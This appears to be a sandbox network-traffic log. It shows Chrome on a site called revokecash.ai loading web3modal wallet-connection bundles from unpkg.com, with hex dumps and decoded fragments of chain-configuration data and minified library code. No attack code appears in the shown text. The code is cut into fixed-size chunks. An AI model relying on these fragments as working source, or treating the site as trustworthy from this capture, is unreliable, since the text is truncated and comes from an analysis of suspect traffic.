                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 61 76 61 78 2d 74 65 73 74 2e 6e 65 74 77 6f 72 6b 2f 65 78 74 2f 62 63 2f 43 2f 72 70 63 22 5d 7d 2c 70 75 62 6c 69 63 3a 7b 68 74 74 70 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 61 76 61 78 2d 74 65 73 74 2e 6e 65 74 77 6f 72 6b 2f 65 78 74 2f 62 63 2f 43 2f 72 70 63 22 5d 7d 7d 2c 62 6c 6f 63 6b 45 78 70 6c 6f 72 65 72 73 3a 7b 65 74 68 65 72 73 63 61 6e 3a 7b 6e 61 6d 65 3a 22 53 6e 6f 77 54 72 61 63 65 22 2c 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 74 65 73 74 6e 65 74 2e 73 6e 6f 77 74 72 61 63 65 2e 69 6f 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6e 61 6d 65 3a 22 53 6e 6f 77 54 72 61 63 65 22 2c 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 74 65 73 74 6e 65 74 2e 73 6e 6f 77 74 72 61 63 65 2e 69 6f 22 7d 7d 2c 63
                                                                          Data Ascii: :["https://api.avax-test.network/ext/bc/C/rpc"]},public:{http:["https://api.avax-test.network/ext/bc/C/rpc"]}},blockExplorers:{etherscan:{name:"SnowTrace",url:"https://testnet.snowtrace.io"},default:{name:"SnowTrace",url:"https://testnet.snowtrace.io"}},c
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 77 6f 72 6b 3a 22 62 6f 62 61 22 2c 6e 61 74 69 76 65 43 75 72 72 65 6e 63 79 3a 7b 64 65 63 69 6d 61 6c 73 3a 31 38 2c 6e 61 6d 65 3a 22 42 6f 62 61 22 2c 73 79 6d 62 6f 6c 3a 22 42 4f 42 41 22 7d 2c 72 70 63 55 72 6c 73 3a 7b 64 65 66 61 75 6c 74 3a 7b 68 74 74 70 3a 5b 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6e 6e 65 74 2e 62 6f 62 61 2e 6e 65 74 77 6f 72 6b 22 5d 7d 2c 70 75 62 6c 69 63 3a 7b 68 74 74 70 3a 5b 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6e 6e 65 74 2e 62 6f 62 61 2e 6e 65 74 77 6f 72 6b 22 5d 7d 7d 2c 62 6c 6f 63 6b 45 78 70 6c 6f 72 65 72 73 3a 7b 65 74 68 65 72 73 63 61 6e 3a 7b 6e 61 6d 65 3a 22 42 4f 42 41 53 63 61 6e 22 2c 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 62 6f 62 61 73 63 61 6e 2e 63 6f 6d 22 7d 2c 64 65 66 61 75 6c 74 3a 7b 6e 61 6d
                                                                          Data Ascii: work:"boba",nativeCurrency:{decimals:18,name:"Boba",symbol:"BOBA"},rpcUrls:{default:{http:["https://mainnet.boba.network"]},public:{http:["https://mainnet.boba.network"]}},blockExplorers:{etherscan:{name:"BOBAScan",url:"https://bobascan.com"},default:{nam
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 37 36 63 61 31 31 22 2c 62 6c 6f 63 6b 43 72 65 61 74 65 64 3a 31 35 39 32 31 34 35 32 7d 7d 7d 2c 6f 6c 3d 7b 69 64 3a 39 37 2c 6e 61 6d 65 3a 22 42 69 6e 61 6e 63 65 20 53 6d 61 72 74 20 43 68 61 69 6e 20 54 65 73 74 6e 65 74 22 2c 6e 65 74 77 6f 72 6b 3a 22 62 73 63 2d 74 65 73 74 6e 65 74 22 2c 6e 61 74 69 76 65 43 75 72 72 65 6e 63 79 3a 7b 64 65 63 69 6d 61 6c 73 3a 31 38 2c 6e 61 6d 65 3a 22 42 4e 42 22 2c 73 79 6d 62 6f 6c 3a 22 74 42 4e 42 22 7d 2c 72 70 63 55 72 6c 73 3a 7b 64 65 66 61 75 6c 74 3a 7b 68 74 74 70 3a 5b 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 2d 73 65 65 64 2d 70 72 65 62 73 63 2d 31 2d 73 31 2e 62 69 6e 61 6e 63 65 2e 6f 72 67 3a 38 35 34 35 22 5d 7d 2c 70 75 62 6c 69 63 3a 7b 68 74 74 70 3a 5b 22 68 74 74 70 73 3a 2f 2f 64 61 74
                                                                          Data Ascii: 76ca11",blockCreated:15921452}}},ol={id:97,name:"Binance Smart Chain Testnet",network:"bsc-testnet",nativeCurrency:{decimals:18,name:"BNB",symbol:"tBNB"},rpcUrls:{default:{http:["https://data-seed-prebsc-1-s1.binance.org:8545"]},public:{http:["https://dat
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 68 74 74 70 73 3a 2f 2f 63 61 6e 74 6f 2e 67 72 61 76 69 74 79 63 68 61 69 6e 2e 69 6f 22 5d 7d 2c 70 75 62 6c 69 63 3a 7b 68 74 74 70 3a 5b 22 68 74 74 70 73 3a 2f 2f 63 61 6e 74 6f 2e 67 72 61 76 69 74 79 63 68 61 69 6e 2e 69 6f 22 5d 7d 7d 2c 62 6c 6f 63 6b 45 78 70 6c 6f 72 65 72 73 3a 7b 64 65 66 61 75 6c 74 3a 7b 6e 61 6d 65 3a 22 54 75 62 65 72 2e 42 75 69 6c 64 20 28 42 6c 6f 63 6b 73 63 6f 75 74 29 22 2c 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 74 75 62 65 72 2e 62 75 69 6c 64 22 7d 7d 2c 63 6f 6e 74 72 61 63 74 73 3a 7b 6d 75 6c 74 69 63 61 6c 6c 33 3a 7b 61 64 64 72 65 73 73 3a 22 30 78 63 61 31 31 62 64 65 30 35 39 37 37 62 33 36 33 31 31 36 37 30 32 38 38 36 32 62 65 32 61 31 37 33 39 37 36 63 61 31 31 22 2c 62 6c 6f 63 6b 43 72 65 61 74 65 64
                                                                          Data Ascii: https://canto.gravitychain.io"]},public:{http:["https://canto.gravitychain.io"]}},blockExplorers:{default:{name:"Tuber.Build (Blockscout)",url:"https://tuber.build"}},contracts:{multicall3:{address:"0xca11bde05977b3631167028862be2a173976ca11",blockCreated


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.549734104.16.123.1754435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:20 UTC619OUTGET /@web3modal/html@2.7.1/dist/cdn/bundle-7a116c93.js HTTP/1.1
                                                                          Host: unpkg.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://unpkg.com/@web3modal/html@2.7.1/dist/cdn/bundle.js
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:20 UTC576INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 53 61 74 2c 20 32 36 20 4f 63 74 20 31
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:20 GMTContent-Type: application/javascript; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-origin: *cache-control: public, max-age=31536000last-modified: Sat, 26 Oct 1
                                                                          2023-12-10 16:44:20 UTC793INData Raw: 33 65 32 33 0d 0a 63 6f 6e 73 74 20 79 65 3d 53 79 6d 62 6f 6c 28 29 2c 61 65 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 65 65 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 77 65 3d 65 3d 3e 65 26 26 28 65 65 2e 68 61 73 28 65 29 3f 65 65 2e 67 65 74 28 65 29 3a 61 65 28 65 29 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 65 28 65 29 3d 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 29 2c 49 65 3d 65 3d 3e 77 65 28 65 29 26 26 65 5b 79 65 5d 7c 7c 6e 75 6c 6c 2c 69 65 3d 28 65 2c 74 3d 21 30 29 3d 3e 7b 65 65 2e 73 65 74 28 65 2c 74 29 7d 2c 51 3d 65 3d 3e 74 79 70 65 6f 66 20 65 3d 3d 22 6f 62 6a 65 63 74 22 26 26 65 21 3d 3d 6e 75 6c 6c 2c 52 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 46 3d 6e 65 77 20 57 65 61 6b
                                                                          Data Ascii: 3e23const ye=Symbol(),ae=Object.getPrototypeOf,ee=new WeakMap,we=e=>e&&(ee.has(e)?ee.get(e):ae(e)===Object.prototype||ae(e)===Array.prototype),Ie=e=>we(e)&&e[ye]||null,ie=(e,t=!0)=>{ee.set(e,t)},Q=e=>typeof e=="object"&&e!==null,R=new WeakMap,F=new Weak
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 2e 69 73 41 72 72 61 79 28 72 29 3f 5b 5d 3a 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 72 29 29 3b 72 65 74 75 72 6e 20 69 65 28 4c 2c 21 30 29 2c 75 2e 73 65 74 28 72 2c 5b 45 2c 4c 5d 29 2c 52 65 66 6c 65 63 74 2e 6f 77 6e 4b 65 79 73 28 72 29 2e 66 6f 72 45 61 63 68 28 24 3d 3e 7b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 4c 2c 24 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 4d 3d 52 65 66 6c 65 63 74 2e 67 65 74 28 72 2c 24 29 2c 5f 3d 7b 76 61 6c 75 65 3a 4d 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 3b 69 66 28 46 2e 68 61 73 28 4d 29 29 69 65 28 4d 2c 21 31 29 3b 65 6c 73
                                                                          Data Ascii: .isArray(r)?[]:Object.create(Object.getPrototypeOf(r));return ie(L,!0),u.set(r,[E,L]),Reflect.ownKeys(r).forEach($=>{if(Object.getOwnPropertyDescriptor(L,$))return;const M=Reflect.get(r,$),_={value:M,enumerable:!0,configurable:!0};if(F.has(M))ie(M,!1);els
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 74 79 70 65 4f 66 28 72 29 29 2c 6f 65 3d 28 69 2c 61 2c 63 2c 6f 2c 57 29 3d 3e 7b 69 66 28 69 26 26 28 65 28 61 2c 6f 29 7c 7c 70 2e 68 61 73 28 6f 29 26 26 65 28 61 2c 70 2e 67 65 74 28 6f 29 29 29 29 72 65 74 75 72 6e 3b 72 65 28 63 29 2c 51 28 6f 29 26 26 28 6f 3d 49 65 28 6f 29 7c 7c 6f 29 3b 6c 65 74 20 4e 3d 6f 3b 69 66 28 6f 20 69 6e 73 74 61 6e 63 65 6f 66 20 50 72 6f 6d 69 73 65 29 6f 2e 74 68 65 6e 28 4f 3d 3e 7b 6f 2e 73 74 61 74 75 73 3d 22 66 75 6c 66 69 6c 6c 65 64 22 2c 6f 2e 76 61 6c 75 65 3d 4f 2c 4c 28 5b 22 72 65 73 6f 6c 76 65 22 2c 5b 63 5d 2c 4f 5d 29 7d 29 2e 63 61 74 63 68 28 4f 3d 3e 7b 6f 2e 73 74 61 74 75 73 3d 22 72 65 6a 65 63 74 65 64 22 2c 6f 2e 72 65 61 73 6f 6e 3d 4f 2c 4c 28 5b 22 72 65 6a 65 63 74 22 2c 5b 63 5d 2c 4f
                                                                          Data Ascii: typeOf(r)),oe=(i,a,c,o,W)=>{if(i&&(e(a,o)||p.has(o)&&e(a,p.get(o))))return;re(c),Q(o)&&(o=Ie(o)||o);let N=o;if(o instanceof Promise)o.then(O=>{o.status="fulfilled",o.value=O,L(["resolve",[c],O])}).catch(O=>{o.status="rejected",o.reason=O,L(["reject",[c],O
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 30 2c 70 26 26 74 28 75 2e 73 70 6c 69 63 65 28 30 29 29 7d 29 29 7d 29 3b 72 65 74 75 72 6e 20 70 3d 21 30 2c 28 29 3d 3e 7b 70 3d 21 31 2c 49 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4c 65 28 65 2c 74 29 7b 63 6f 6e 73 74 20 73 3d 52 2e 67 65 74 28 65 29 3b 28 69 6d 70 6f 72 74 2e 6d 65 74 61 2e 65 6e 76 3f 69 6d 70 6f 72 74 2e 6d 65 74 61 2e 65 6e 76 2e 4d 4f 44 45 3a 76 6f 69 64 20 30 29 21 3d 3d 22 70 72 6f 64 75 63 74 69 6f 6e 22 26 26 21 73 26 26 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 50 6c 65 61 73 65 20 75 73 65 20 70 72 6f 78 79 20 6f 62 6a 65 63 74 22 29 3b 63 6f 6e 73 74 5b 6e 2c 6c 2c 75 5d 3d 73 3b 72 65 74 75 72 6e 20 75 28 6e 2c 6c 28 29 2c 74 29 7d 63 6f 6e 73 74 20 6d 3d 50 28 7b 68 69 73 74 6f 72 79 3a 5b 22 43 6f 6e 6e 65 63 74 57 61
                                                                          Data Ascii: 0,p&&t(u.splice(0))}))});return p=!0,()=>{p=!1,I()}}function Le(e,t){const s=R.get(e);(import.meta.env?import.meta.env.MODE:void 0)!=="production"&&!s&&console.warn("Please use proxy object");const[n,l,u]=s;return u(n,l(),t)}const m=P({history:["ConnectWa
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 74 2c 73 29 3b 6c 65 74 20 6e 3d 65 3b 6e 2e 69 6e 63 6c 75 64 65 73 28 22 3a 2f 2f 22 29 7c 7c 28 6e 3d 65 2e 72 65 70 6c 61 63 65 41 6c 6c 28 22 2f 22 2c 22 22 29 2e 72 65 70 6c 61 63 65 41 6c 6c 28 22 3a 22 2c 22 22 29 2c 6e 3d 60 24 7b 6e 7d 3a 2f 2f 60 29 2c 6e 2e 65 6e 64 73 57 69 74 68 28 22 2f 22 29 7c 7c 28 6e 3d 60 24 7b 6e 7d 2f 60 29 2c 74 68 69 73 2e 73 65 74 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 44 65 65 70 4c 69 6e 6b 28 6e 2c 73 29 3b 63 6f 6e 73 74 20 6c 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 3b 72 65 74 75 72 6e 60 24 7b 6e 7d 77 63 3f 75 72 69 3d 24 7b 6c 7d 60 7d 2c 66 6f 72 6d 61 74 55 6e 69 76 65 72 73 61 6c 55 72 6c 28 65 2c 74 2c 73 29 7b 69 66 28 21 67 2e 69 73 48 74 74 70 55 72 6c 28 65 29 29 72 65 74
                                                                          Data Ascii: t,s);let n=e;n.includes("://")||(n=e.replaceAll("/","").replaceAll(":",""),n=`${n}://`),n.endsWith("/")||(n=`${n}/`),this.setWalletConnectDeepLink(n,s);const l=encodeURIComponent(t);return`${n}wc?uri=${l}`},formatUniversalUrl(e,t,s){if(!g.isHttpUrl(e))ret
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 65 74 22 20 76 69 65 77 20 64 61 74 61 27 29 3b 72 65 74 75 72 6e 20 74 7d 2c 67 65 74 53 77 69 74 63 68 4e 65 74 77 6f 72 6b 52 6f 75 74 65 72 44 61 74 61 28 29 7b 76 61 72 20 65 3b 63 6f 6e 73 74 20 74 3d 28 65 3d 42 2e 73 74 61 74 65 2e 64 61 74 61 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 65 2e 53 77 69 74 63 68 4e 65 74 77 6f 72 6b 3b 69 66 28 21 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 4d 69 73 73 69 6e 67 20 22 53 77 69 74 63 68 4e 65 74 77 6f 72 6b 22 20 76 69 65 77 20 64 61 74 61 27 29 3b 72 65 74 75 72 6e 20 74 7d 2c 69 73 50 72 65 66 65 72 49 6e 6a 65 63 74 65 64 46 6c 61 67 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6c 6f 63 61 74 69 6f 6e 3c 22 75 22 3f 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6c
                                                                          Data Ascii: et" view data');return t},getSwitchNetworkRouterData(){var e;const t=(e=B.state.data)==null?void 0:e.SwitchNetwork;if(!t)throw new Error('Missing "SwitchNetwork" view data');return t},isPreferInjectedFlag(){return typeof location<"u"?new URLSearchParams(l
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 61 64 65 64 3a 21 31 2c 69 73 50 72 65 66 65 72 49 6e 6a 65 63 74 65 64 3a 21 31 7d 29 2c 41 3d 7b 73 74 61 74 65 3a 79 2c 73 75 62 73 63 72 69 62 65 28 65 29 7b 72 65 74 75 72 6e 20 44 28 79 2c 28 29 3d 3e 65 28 79 29 29 7d 2c 73 65 74 43 68 61 69 6e 73 28 65 29 7b 79 2e 63 68 61 69 6e 73 3d 65 7d 2c 67 65 74 53 65 6c 65 63 74 65 64 43 68 61 69 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 6a 2e 63 6c 69 65 6e 74 28 29 2e 67 65 74 4e 65 74 77 6f 72 6b 28 29 2e 63 68 61 69 6e 3b 72 65 74 75 72 6e 20 65 26 26 28 79 2e 73 65 6c 65 63 74 65 64 43 68 61 69 6e 3d 65 29 2c 79 2e 73 65 6c 65 63 74 65 64 43 68 61 69 6e 7d 2c 73 65 74 53 65 6c 65 63 74 65 64 43 68 61 69 6e 28 65 29 7b 79 2e 73 65 6c 65 63 74 65 64 43 68 61 69 6e 3d 65 7d 2c 73 65 74 49 73 43 75 73 74 6f 6d
                                                                          Data Ascii: aded:!1,isPreferInjected:!1}),A={state:y,subscribe(e){return D(y,()=>e(y))},setChains(e){y.chains=e},getSelectedChain(){const e=j.client().getNetwork().chain;return e&&(y.selectedChain=e),y.selectedChain},setSelectedChain(e){y.selectedChain=e},setIsCustom
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 64 65 6e 74 69 74 79 2f 24 7b 65 7d 3f 63 68 61 69 6e 49 64 3d 24 7b 6e 7d 26 70 72 6f 6a 65 63 74 49 64 3d 24 7b 73 7d 60 3b 72 65 74 75 72 6e 28 61 77 61 69 74 20 66 65 74 63 68 28 6c 29 29 2e 6a 73 6f 6e 28 29 7d 7d 2c 64 3d 50 28 7b 61 64 64 72 65 73 73 3a 76 6f 69 64 20 30 2c 70 72 6f 66 69 6c 65 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 70 72 6f 66 69 6c 65 41 76 61 74 61 72 3a 76 6f 69 64 20 30 2c 70 72 6f 66 69 6c 65 4c 6f 61 64 69 6e 67 3a 21 31 2c 62 61 6c 61 6e 63 65 4c 6f 61 64 69 6e 67 3a 21 31 2c 62 61 6c 61 6e 63 65 3a 76 6f 69 64 20 30 2c 69 73 43 6f 6e 6e 65 63 74 65 64 3a 21 31 7d 29 2c 50 65 3d 7b 73 74 61 74 65 3a 64 2c 73 75 62 73 63 72 69 62 65 28 65 29 7b 72 65 74 75 72 6e 20 44 28 64 2c 28 29 3d 3e 65 28 64 29 29 7d 2c 67 65 74 41 63 63
                                                                          Data Ascii: dentity/${e}?chainId=${n}&projectId=${s}`;return(await fetch(l)).json()}},d=P({address:void 0,profileName:void 0,profileAvatar:void 0,profileLoading:!1,balanceLoading:!1,balance:void 0,isConnected:!1}),Pe={state:d,subscribe(e){return D(d,()=>e(d))},getAcc
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 2c 6c 65 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 2c 55 65 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 65 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2c 63 65 3d 28 65 2c 74 2c 73 29 3d 3e 74 20 69 6e 20 65 3f 4d 65 28 65 2c 74 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 73 7d 29 3a 65 5b 74 5d 3d 73 2c 53 65 3d 28 65 2c 74 29 3d 3e 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 74 7c 7c 28 74 3d 7b 7d 29 29 55 65 2e 63 61 6c 6c 28 74 2c
                                                                          Data Ascii: t.defineProperty,le=Object.getOwnPropertySymbols,Ue=Object.prototype.hasOwnProperty,De=Object.prototype.propertyIsEnumerable,ce=(e,t,s)=>t in e?Me(e,t,{enumerable:!0,configurable:!0,writable:!0,value:s}):e[t]=s,Se=(e,t)=>{for(var s in t||(t={}))Ue.call(t,


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.549735104.16.123.1754435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:21 UTC638OUTGET /@web3modal/ethereum@2.7.1/dist/cdn/index.es-73b49c04.js HTTP/1.1
                                                                          Host: unpkg.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://unpkg.com/@web3modal/ethereum@2.7.1/dist/cdn/bundle-b2289479.js
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:21 UTC577INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 53 61 74 2c 20 32 36 20 4f 63 74 20 31
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:21 GMTContent-Type: application/javascript; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-origin: *cache-control: public, max-age=31536000last-modified: Sat, 26 Oct 1
                                                                          2023-12-10 16:44:21 UTC792INData Raw: 37 64 36 30 0d 0a 69 6d 70 6f 72 74 7b 72 20 61 73 20 62 5f 2c 45 20 61 73 20 75 72 7d 66 72 6f 6d 22 2e 2f 5f 5f 70 6f 6c 79 66 69 6c 6c 2d 6e 6f 64 65 2e 65 76 65 6e 74 73 2d 65 37 35 61 30 35 30 66 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 67 20 61 73 20 4a 6e 2c 63 20 61 73 20 63 72 2c 62 20 61 73 20 73 65 2c 64 20 61 73 20 77 5f 2c 77 20 61 73 20 4b 6c 2c 72 20 61 73 20 47 6c 2c 66 20 61 73 20 41 63 2c 74 20 61 73 20 66 6f 2c 65 20 61 73 20 45 5f 2c 61 20 61 73 20 57 6c 2c 49 20 61 73 20 5f 69 2c 41 20 61 73 20 78 5f 2c 55 20 61 73 20 49 5f 2c 68 20 61 73 20 51 2c 69 20 61 73 20 53 5f 2c 6a 20 61 73 20 61 63 2c 6b 20 61 73 20 50 5f 2c 5f 20 61 73 20 4f 5f 2c 50 20 61 73 20 41 5f 2c 56 20 61 73 20 71 68 2c 6c 20 61 73 20 43 5f 2c 44 20 61 73 20 52 5f 2c 43
                                                                          Data Ascii: 7d60import{r as b_,E as ur}from"./__polyfill-node.events-e75a050f.js";import{g as Jn,c as cr,b as se,d as w_,w as Kl,r as Gl,f as Ac,t as fo,e as E_,a as Wl,I as _i,A as x_,U as I_,h as Q,i as S_,j as ac,k as P_,_ as O_,P as A_,V as qh,l as C_,D as R_,C
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 0a 0a 50 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 75 73 65 2c 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 2f 6f 72 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 66 6f 72 20 61 6e 79 0a 70 75 72 70 6f 73 65 20 77 69 74 68 20 6f 72 20 77 69 74 68 6f 75 74 20 66 65 65 20 69 73 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 2e 0a 0a 54 48 45 20 53 4f 46 54 57 41 52 45 20 49 53 20 50 52 4f 56 49 44 45 44 20 22 41 53 20 49 53 22 20 41 4e 44 20 54 48 45 20 41 55 54 48 4f 52 20 44 49 53 43 4c 41 49 4d 53 20 41 4c 4c 20 57 41 52 52 41 4e 54 49
                                                                          Data Ascii: *************************Copyright (c) Microsoft Corporation.Permission to use, copy, modify, and/or distribute this software for anypurpose with or without fee is hereby granted.THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTI
                                                                          2023-12-10 16:44:21 UTC1369INData Raw: 2e 69 6e 64 65 78 4f 66 28 6e 29 3c 30 26 26 28 74 5b 6e 5d 3d 61 5b 6e 5d 29 3b 69 66 28 61 21 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 66 6f 72 28 76 61 72 20 6f 3d 30 2c 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 61 29 3b 6f 3c 6e 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 72 2e 69 6e 64 65 78 4f 66 28 6e 5b 6f 5d 29 3c 30 26 26 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2e 63 61 6c 6c 28 61 2c 6e 5b 6f 5d 29 26 26 28 74 5b 6e 5b 6f 5d 5d 3d 61 5b 6e 5b 6f 5d 5d 29 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20
